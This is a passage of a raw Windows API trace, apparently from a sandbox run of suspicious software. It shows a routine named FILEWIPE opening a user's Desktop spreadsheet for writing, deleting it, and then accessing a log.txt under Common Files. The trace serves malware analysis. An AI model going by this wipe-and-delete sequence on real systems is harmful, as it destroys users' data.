wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.868] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.868] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0031.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.869] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15ee7920, ftCreationTime.dwHighDateTime=0x1d5c4c1, ftLastAccessTime.dwLowDateTime=0x3fe3c5a0, ftLastAccessTime.dwHighDateTime=0x1d5b756, ftLastWriteTime.dwLowDateTime=0x3fe3c5a0, ftLastWriteTime.dwHighDateTime=0x1d5b756, nFileSizeHigh=0x0, nFileSizeLow=0x17922, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T 5FxqsHMby.xlsx", cAlternateFileName="T5FXQS~1.XLS")) returned 0x7c2240 [0031.869] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.869] CharLowerBuffW (in: lpsz="byte[96546]", cchLength=0xb | out: lpsz="byte[96546]") returned 0xb [0031.870] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.870] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.870] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.870] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.870] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.871] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.871] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.871] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.871] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.872] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.872] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\t 5fxqshmby.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0031.873] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.874] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.874] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.874] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.874] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.874] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.874] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.874] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.874] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.874] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.875] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.875] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.875] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.875] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.875] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.875] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.875] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", lpFilePart=0x0) returned 0x4e [0031.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15ee7920, ftCreationTime.dwHighDateTime=0x1d5c4c1, ftLastAccessTime.dwLowDateTime=0x3fe3c5a0, ftLastAccessTime.dwHighDateTime=0x1d5b756, ftLastWriteTime.dwLowDateTime=0x12e157c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17922, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="T 5FxqsHMby.xlsx", cAlternateFileName="T5FXQS~1.XLS")) returned 0x7c2240 [0031.875] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\t 5fxqshmby.xlsx")) returned 1 [0031.877] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15ee7920, ftCreationTime.dwHighDateTime=0x1d5c4c1, ftLastAccessTime.dwLowDateTime=0x3fe3c5a0, ftLastAccessTime.dwHighDateTime=0x1d5b756, ftLastWriteTime.dwLowDateTime=0x12e157c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17922, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="T 5FxqsHMby.xlsx", cAlternateFileName="T5FXQS~1.XLS")) returned 0 [0031.877] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.877] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.879] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.879] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.880] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.880] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0031.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.881] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.881] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xabd, lpOverlapped=0x0) returned 1 [0031.882] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.882] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xabd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.882] SetFilePointerEx (in: 